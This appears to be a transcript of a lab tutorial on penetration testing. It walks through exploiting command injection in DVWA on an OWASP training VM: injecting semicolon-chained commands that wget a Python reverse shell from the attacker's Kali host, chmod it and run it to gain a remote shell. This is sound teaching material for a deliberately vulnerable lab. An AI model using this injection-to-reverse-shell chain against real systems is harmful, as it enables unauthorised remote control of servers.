Hello everyone and welcome back. In this tutorial, we're going to take a look at a different type or a different way to actually exploit the command injection vulnerability on our OWASP virtual machine. So we saw a way where we actually use Netcat and we actually use the command injection vulnerability on a specific page on DVWA on our OWASP virtual machine in order to be able to actually execute the commands on the target system. But right now, let's use that knowledge that we already have and let's combine it with the actual tools that we created previously. And those tools are our reverse shell coded in Python. So this is our simple reverse shell that we coded previously. Right after the system hacking section, it simply just enters the while true loop and executes the command and sends back the result to our server, or in our case to our Kali Linux virtual machine. So let's see how we can actually deliver this to the target without the target needing to have any type of interaction with this file. So we're going to use the command injection vulnerability to deliver this to our target, and then we're also going to use the command injection vulnerability to run this script on the target system and listen for the incoming connection right here in Kali Linux. So let's see how we can do that. What you need to do, you need to start up your OWASP virtual machine, and I have already done that right here. All I need to do is log in, so the username is root and the password is OWASP BWA. I will click here enter. Let me just check the IP address. It is 192.168.1.10. So I will go to my actual Google Chrome and I will type in the IP address. We want to navigate right here to DVWA. Click there. Log in right here, so it is admin, press here enter, and we want to go back to the command execution, or should I say command injection. So we already know how this program works, we tested it before. You simply just input the IP address, you press here enter, and it will retrieve the amount of times it actually pinged it. So in this case it pinged 3 times, it sent 3 packets, and this is the output of the actual server program. But we already know that we can actually execute any type of commands that are executable in Linux terminal. So we can, for example, type 192.168.1.1 and then comma who am I. So we already know this. It will give an output of the ping command and it will also give an output of the who am I command. So right now, let's see how we can actually deliver our reverse shell.py to our target. First thing you need to do, open up your terminal on your Kali Linux machine. I will zoom this in. And what we want to do, first of all, we want to start up our Apache 2 web server. And we can do that using the command service apache 2 start. Press here enter. And right now our Apache 2 is started. You can check whether it is working simply just by typing service apache 2 and then status. And you can see it will say it is active and running. Okay? So the next thing, or the next step that we want to perform, is we want to copy our reverse.py to the Apache 2 folder. But before we do that, we need to actually nano the reverse.py and check out whether everything is specified correctly. So we want to connect back to the IP address of our Kali Linux machine over the port 4444. Once you have checked that, you can simply just close the program and you can copy it to the /var/www/html folder. Click here enter, and now if we go to that folder, if we type ls there, we should have our reverse.py there. Okay? The next thing that we want to do is navigate back to the desktop where our server.py is. We want to make it an executable on Linux, and we can do that using the command chmod +x and then server.py. Press here enter and we're good to go and we can run our server. Okay? So our server is listening for incoming connections. The only thing we're left to do is deliver this to our target system. So we're going to do that using the wget command, and the wget command comes in Linux already. And simply what it does, if you simply just type wget and then the path to a certain file on a specific website or a link to a file, it will download it automatically to the directory where you're running the command. So right here, if I, for example, on my desktop directory, create a directory called empty, let's call it like that, and cd to the empty directory and type ls, you will see nothing is here. But if I, for example, try to download the reverse.py file, which is on the actual Apache 2 web server directory on our Kali Linux machine, I can do that using the wget command. So I will simply just type wget and then the IP address, which in my case is 192.168.1.4, which is the IP address of my Kali Linux virtual machine, and then slash, and then the actual name of the file that I want to download. In my case, it is reverse.py. Press here enter, it will download the file for me. As you can see, if I type ls once again, now I will have the reverse.py in my empty directory. If I cat it, you can see this is the exact same file that we actually used, that we actually copied to the Apache 2 directory. Okay, so right now I will simply just delete this directory as we don't really need it, and I will exit this terminal. And now we want to perform the same thing onto our target system. So let's go to the actual web page where there is a command injection vulnerability. So we know that the command injection vulnerability allows us to execute system commands, so let's try to execute the wget command. We'll simply just type dot and comma in order to specify the next command, and then we will type wget 192.168.1.4 slash reverse.py. And the reason why we are specifying this link is if you simply just visit the 192.168.1.4, which is my Kali Linux virtual machine, you will see there is only one file on our Apache 2 web server directory, and that is reverse.py. If the reverse.py was, for example, in another directory on the Apache 2 directory, I would have to specify the full path to this file. But since this is the only file right here, and it is not in a specific subdirectory, we can simply just get it with this command. So let's click here submit, press here enter, and we can see if I just type dot and comma ls, press here enter, we will have two actual reverse shells.py. Now the reason why I have two is because I already tested this previously. You will only have one, so you will not have this one, which is reverse.py.1. This is only for me because I did this twice already. And now the next thing that we want to do is if we try to run this reverse.py, you will notice that nothing will happen. And the reason why nothing will happen is because we need to actually make this reverse.py executable on our target machine before we actually run it and establish connection. So let's do that as well. Dot and comma and then chmod plus x and then reverse.py, or whatever the name of your reverse shell is. Press here enter or submit. And now if you simply just try to run it, you will see that we will receive the connection back to us in Kali Linux. So let's go and run it. We run it, we first specify dot and comma for the next command, and then dot, slash, and then reverse.py. Press here enter, and you will notice once again the page is loading because this actual program is executing, and it will continue loading as long as we are connected to the target. As you can see right here, if I go back to Kali Linux, we have target connected. We have the target from the IP address of our OS virtual machine, and if I simply just type who am I, you will see we got the OS virtual machine and we successfully hacked it. You can execute other commands if you want, ls, you can cat reverse.py if you want to. You can simply just do anything on this target system right now. So basically that would be about it for this tutorial. I hope you enjoyed this creative way of combining the vulnerability on a web page and the tools that we created in order to hack the target. So once again, that would be about it, and I hope I will see you in the next tutorial. Bye!